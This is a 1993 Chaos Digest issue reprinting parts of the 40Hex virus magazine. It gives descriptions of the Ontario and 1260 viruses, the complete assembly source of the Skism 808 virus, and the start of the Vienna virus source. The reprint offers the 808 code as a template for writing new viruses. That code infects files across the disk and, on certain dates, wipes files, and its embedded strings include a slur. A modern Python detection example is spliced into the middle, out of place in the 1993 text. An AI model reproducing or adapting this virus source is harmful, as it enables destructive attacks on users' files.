Chaos Digest Wednesday 19 May 1993 Volume 1 : Number 30
ISSN 1244-4901

Editor: Jean-Bernard Condat (jbcondat@attmail.com)
Archivist: Yves-Marie Crabbe
Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.30 (19 May 1993)
File 1--40H VMag Issue 1 Volume 2 #008-11(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following information:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found on some French BBS. Back issues of
ChaosD can be found on the Internet as part of the Computer underground
Digest archives. They're accessible using anonymous FTP from:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 2 #008-11(1) (reprint)


40Hex Volume 1 Issue 2 0008

The Ontario Virus

Here's a quick nice little virus from our boyz up north.

V Status: Rare
Discovered: July, 1990
Symptoms: .COM & .EXE growth; decrease in system and free memory;
hard disk errors in the case of extreme infections
Origin: Ontario, Canada
Eff Length: 512 Bytes
Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV
Removal Instructions: SCAN /D, or Delete infected files
General Comments:

The Ontario Virus was isolated by Mike Shields in Ontario, Canada
in July, 1990. The Ontario virus is a memory resident infector of
.COM, .EXE, and overlay files. It will infect COMMAND.COM.

The first time a program infected with the Ontario Virus is executed,
it will install itself memory resident above the top of system memory
but below the 640K DOS boundary. Total system memory and free memory
will be decreased by 2,048 bytes. At this time, the virus will
infect COMMAND.COM on the C: drive, increasing its length by 512 bytes.

Each time an uninfected program is executed on the system with the
virus memory resident, the program will become infected with the viral
code located at the end of the file. For .COM files, they will
increase by 512 bytes in all cases. For .EXE and overlay files, the
file length increase will be 512 - 1023 bytes. The difference in
length for .EXE and overlay files is because the virus will fill out
the unused space at the end of the last sector of the uninfected file
with random data (usually a portion of the directory) and then append
itself to the end of the file at the next sector. Systems using
a sector size of more than 512 bytes may notice larger file increases
for infected files. Infected files will always have a file length
that is a multiple of the sector size on the disk.

In the case of extreme infections of the Ontario Virus, hard disk
errors may be noticed.

Ontario uses a complex encryption routine, and a simple identification
string will not identify this virus.

---------------------------------------------------------------------------


--------------------------------------------------------------------------
HR

+++++

40Hex Volume 1 Issue 2 0009

The 1260 Virus

Here's a nice little encrypting virus written in America.

Aliases: V2P1
V Status: Research
Discovery: January, 1990
Symptoms: .COM file growth
Origin: Minnesota, USA
Eff Length: 1,260 Bytes
Type Code: PNC - Parasitic Encrypting Non-Resident .COM Infector
Detection Method: ViruScan V57+, IBM Scan, Pro-Scan 1.4+, F-Prot 1.12+,
AVTK 3.5+, VirHunt 2.0+, NAV
Removal Instructions: CleanUp V57+, Pro-Scan 1.4+, F-Prot 1.12+,
VirHunt 2.0+
General Comments:

The 1260 virus was first isolated in January, 1990. This virus does not
install itself resident in memory, but it is extremely virulent at infecting
.COM files. Infected files will have their length increased by 1,260 bytes,
and the resulting file will be encrypted. The encryption key changes with
each infection which occurs.

The 1260 virus is derived from the original Vienna Virus, though it is highly
modified.

This virus was developed as a research virus by Mark Washburn, who wished to
show the anti-viral community why identification string scanners do not work
in all cases. The encryption used in 1260 is one of many possible cases of
the encryption which may occur with Washburn's later research virus, V2P2.

-----------------------------------------------------------------------------


--------------------------------------------------------------------------
HR
+++++

40Hex Volume 1 Issue 2 0010

The 808 Virus

Here's another virus from Skism. It's a quick overwriting virus but
you can use the source code to write your own viruses.

--------------------------------------------------------------------------

;The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods.

filename EQU 30 ;used to find file name
fileattr EQU 21 ;used to find file attributes
filedate EQU 24 ;used to find file date
filetime EQU 22 ;used to find file time

code_start EQU 0100h ;start of all .COM files
virus_size EQU 808 ;TR 808

code segment 'code'
assume cs:code,ds:code,es:code
org code_start

main proc near

jmp virus_start

encrypt_val db 00h

virus_start:

call encrypt ;encrypt/decrypt file
jmp virus ;go to start of code

encrypt:

push cx
mov bx,offset virus_code ;start encryption at data

xor_loop:

mov ch,[bx] ;read current byte
xor ch,encrypt_val ;get encryption key
mov [bx],ch ;switch bytes
inc bx ;move bx up a byte
cmp bx,offset virus_code+virus_size
;are we done with the encryption
jle xor_loop ;no? keep going
pop cx
ret

infectfile:

mov dx,code_start ;where virus starts in memory
mov bx,handle ;load bx with handle
push bx ;save handle on stack
call encrypt ;encrypt file
pop bx ;get back bx
mov cx,virus_size ;number of bytes to write
mov ah,40h ;write to file
int 21h
push bx
call encrypt ;fix up the mess
pop bx
ret

virus_code:

wildcards db "*",0 ;search for directory argument
filespec db "*.EXE",0 ;search for EXE file argument
filespec2 db "*.*",0
rootdir db "\",0 ;argument for root directory
dirdata db 43 dup (?) ;holds directory DTA
filedata db 43 dup (?) ;holds files DTA
diskdtaseg dw ? ;holds disk dta segment
diskdtaofs dw ? ;holds disk dta offset
tempofs dw ? ;holds offset
tempseg dw ? ;holds segment
drivecode db ? ;holds drive code
currentdir db 64 dup (?) ;save current directory into this
handle dw ? ;holds file handle
orig_time dw ? ;holds file time
orig_date dw ? ;holds file date
orig_attr dw ? ;holds file attr
idbuffer dw 2 dup (?) ;holds virus id

virus:

mov ax,3000h ;get dos version
int 21h
cmp al,02h ;is it at least 2.00?
jb bus1 ;won't infect less than 2.00
mov ah,2ch ;get time
int 21h
mov encrypt_val,dl ;save m_seconds to encrypt val so
;theres 100 mutations possible
setdta:

mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h

newdir:

mov ah,19h ;get drive code
int 21h
mov dl,al ;save drivecode
inc dl ;add one to dl, because functions differ
mov ah,47h ;get current directory
mov si, offset currentdir ;buffer to save directory in
int 21h

mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h

scandirs:

mov cx,13h ;include hidden/ro directorys
mov dx, offset wildcards ;look for '*'
mov ah,4eh ;find first file
int 21h
cmp ax,12h ;no first file?
jne dirloop ;no dirs found? bail out

bus1:

jmp bus

dirloop:

mov ah,4fh ;find next file
int 21h
cmp ax,12h
je bus ;no more dirs found, roll out

chdir:

mov dx,offset dirdata+filename;point dx to fcb - filename
mov ah,3bh ;change directory
int 21h ;

mov ah,2fh ;get current dta address
int 21h
mov [diskdtaseg],es ;save old segment
mov [diskdtaofs],bx ;save old offset
mov dx,offset filedata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h

scandir:

mov cx,07h ;find any attribute
mov dx,offset filespec ;point dx to "*.COM",0
mov ah,4eh ;find first file function
int 21h
cmp ax,12h ;was file found?
jne transform

nextexe:

mov ah,4fh ;find next file
int 21h
cmp ax,12h ;none found
jne transform ;found see what we can do

mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h
mov ah,1ah ;set dta address
mov ds,[diskdtaseg] ;restore old segment
mov dx,[diskdtaofs] ;restore old offset
int 21h
jmp dirloop

bus:

jmp rollout

transform:

mov ah,2fh ;temporally store dta
int 21h
mov [tempseg],es ;save old segment
mov [tempofs],bx ;save old offset
mov dx, offset filedata + filename

mov bx,offset filedata ;save file...
mov ax,[bx]+filedate ;date
mov orig_date,ax ;
mov ax,[bx]+filetime ;time
mov orig_time,ax ; and
mov ax,[bx]+fileattr
mov ax,4300h
int 21h
mov orig_attr,cx
mov ax,4301h ;change attributes
xor cx,cx ;clear attributes
int 21h
mov ax,3d00h ;open file - read
int 21h
jc fixup ;error - find another file
mov handle,ax ;save handle
mov ah,3fh ;read from file
mov bx,handle ;move handle to bx
mov cx,02h ;read 2 bytes
mov dx,offset idbuffer ;save to buffer
int 21h

mov ah,3eh ;close file for now
mov bx,handle ;load bx with handle
int 21h

mov bx, idbuffer ;fill bx with id string
cmp bx,02ebh ;infected?
jne doit ;same - find another file

fixup:
mov ah,1ah ;set dta address
mov ds,[tempseg] ;restore old segment
mov dx,[tempofs] ;restore old offset
int 21h
jmp nextexe

doit:

mov dx, offset filedata + filename
mov ax,3d02h ;open file read/write access
int 21h
mov handle,ax ;save handle

call infectfile

;mov ax,3eh ;close file
;int 21h

rollout:

mov ax,5701h ;restore original
mov bx,handle
mov cx,orig_time ;time and
mov dx,orig_date ;date
int 21h

mov ax,4301h ;restore original attributes
mov cx,orig_attr
mov dx,offset filedata + filename
int 21h
;mov bx,handle
;mov ax,3eh ;close file
;int 21h
mov ah,3bh ;try to fix this
mov dx,offset rootdir ;for speed
int 21h
mov ah,3bh ;change directory
mov dx,offset currentdir ;back to original
int 21h
mov ah,2ah ;check system date
int 21h
cmp cx,1991 ;is it at least 1991?
jb audi ;no? don't do it now
cmp dl,25 ;is it the 25th?
jb audi ;not yet? quit
cmp al,5 ;is Friday?
jne audi ;no? quit
mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h
mov ah,4eh ;find first file
mov cx,7h
mov dx,offset filespec2 ;offset *.*

Loops:

int 21h
jc audi ;error? then quit
mov ax,4301h ;find all normal files
xor cx,cx
int 21h
mov dx,offset dirdata + filename
mov ah,3ch ;fuck up all files in current dir
int 21h
jc audi ;error? quit
mov ah,4fh ;find next file
jmp loops

audi:

mov ax,4c00h ;end program
int 21h

;The below is just text to pad out the virus size to 808 bytes. Don't
;just change the text and claim that this is your creation.

words_ db "Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods",0
words2 db " Dont alter this code into your own strain, faggit. ",0
words3 db " HR/SSS NYCity, this is the fifth of many, many more....",0
words4 db " You sissys.....",0

main endp
code ends
end main
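The detection side of two points made above: the 1260 write-up's claim that identification-string scanners fail against per-infection encryption, and the Skism 808 encrypt loop, which XORs its body with a single byte taken from the hundredths-of-seconds clock (100 possible keys). This is an added example, not code from 40Hex or the Digest; the "body", "stub" and signature bytes are constructed stand-ins, and the image layout (clear stub, stored key, encrypted body) is an assumption that mirrors the 808 source rather than any real sample.

```python
"""
Fixed identification string vs. "X-ray" scanning of a single-byte-XOR body.
All data below is constructed for illustration; none of it is virus code.
"""
from typing import Optional

# Constructed stand-ins. BODY_SIGNATURE is the string a scanner would carry;
# DECRYPTOR_STUB stands for the decrypt loop a simple encrypting virus leaves
# in clear in front of its encrypted body.
BODY_SIGNATURE = b"SAMPLE-BODY:"
PLAIN_BODY = BODY_SIGNATURE + bytes(range(0x20, 0x60)) * 4
DECRYPTOR_STUB = b"DECRYPT-STUB"
KEY_SPACE = range(100)  # hundredths of a second, as in the 808 source


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR over a buffer; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def make_mutation(key: int) -> bytes:
    """Constructed image of one infection: clear stub, stored key, XORed body."""
    return DECRYPTOR_STUB + bytes([key]) + xor_bytes(PLAIN_BODY, key)


def signature_scan(image: bytes, signature: bytes) -> bool:
    """Classic identification-string scanner: exact byte match only."""
    return signature in image


def xray_scan(image: bytes, signature: bytes) -> Optional[int]:
    """Try every single-byte key and report the one under which the
    signature appears in clear, or None if no key works."""
    for key in range(256):
        if signature in xor_bytes(image, key):
            return key
    return None


def detection_counts() -> dict:
    """Hits per method over all 100 mutations of the constructed sample."""
    mutations = [make_mutation(k) for k in KEY_SPACE]
    return {
        # Only the key-0 mutation leaves the body in clear.
        "body_signature": sum(signature_scan(m, BODY_SIGNATURE) for m in mutations),
        # Matching the constant stub still works here; 1260/V2P2-style
        # viruses vary the decryptor too, which is Washburn's point.
        "stub_signature": sum(signature_scan(m, DECRYPTOR_STUB) for m in mutations),
        "xray": sum(xray_scan(m, BODY_SIGNATURE) is not None for m in mutations),
        "total": len(mutations),
    }


if __name__ == "__main__":
    for method, hits in detection_counts().items():
        print(f"{method:15s} {hits}")
```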

+++++

40Hex Volume 1 Issue 2 0011

Vienna and Violator Viruses

The Vienna virus, since its source code was released, has become
one of the most common viruses ever. Not only that but there are
over 20 known strains of this virus. We at 40Hex want to add on to
the list by giving out the source for the original Vienna virus as
well as the Violator-B source by Rabid.

---------------------------------------------------------------------------

MOV_CX MACRO X
DB 0B9H
DW X
ENDM

CODE SEGMENT
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
ORG $+0100H

;***************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, follow. by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;***************************************************************************

VCODE: JMP virus

;This was the rest of the original .COM file. Tiny and simple, this time

NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP

;************************************************************
; The actual virus starts here
;************************************************************

v_start equ $

virus: PUSH CX
MOV DX,OFFSET vir_dat ;This is where the virus data starts.
; The 2nd and 3rd bytes get modified.
CLD ;Pointers will be auto INcremented
MOV SI,DX ;Access data as offset from SI
ADD SI,first_3 ;Point to original 1st 3 bytes of .COM
MOV DI,OFFSET 100H ;cause all .COM files start at 100H
MOV CX,3
REPZ MOVSB ;Restore original first 3 bytes of .COM
MOV SI,DX ;Keep SI pointing to the data area

;*************************************************************
; Check the DOS version
;*************************************************************

MOV AH,30H
INT 21H

CMP AL,0 ;0 means it's version 1.X

JNZ dos_ok ;For version 2.0 or greater
JMP quit ;Don't try to infect version 1.X

;*************************************************************
; Here if the DOS version is high enough for this to work
;*************************************************************

dos_ok: PUSH ES

;*************************************************************
; Get DTA address into ES:BX
;*************************************************************

MOV AH,2FH
INT 21H

;*************************************************************
; Save the DTA address
;*************************************************************

MOV [SI+old_dta],BX
MOV [SI+old_dts],ES ;Save the DTA address

POP ES

;*************************************************************
; Set DTA to point inside the virus data area
;*************************************************************

MOV DX,dta ;Offset of new DTA in virus data area
; NOP ;MASM will add this NOP here
ADD DX,SI ;Compute DTA address
MOV AH,1AH
INT 21H ;Set new DTA to inside our own code

PUSH ES
PUSH SI
MOV ES,DS:2CH
MOV DI,0 ;ES:DI points to environment

;************************************************************
; Find the "PATH=" string in the environment
;************************************************************

find_path:
POP SI
PUSH SI ;Get SI back
ADD SI,env_str ;Point to "PATH=" string in data area
LODSB
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long
REPNZ SCASB ;Search for first character
MOV CX,4

------------------------------

End of Chaos Digest #1.30
************************************
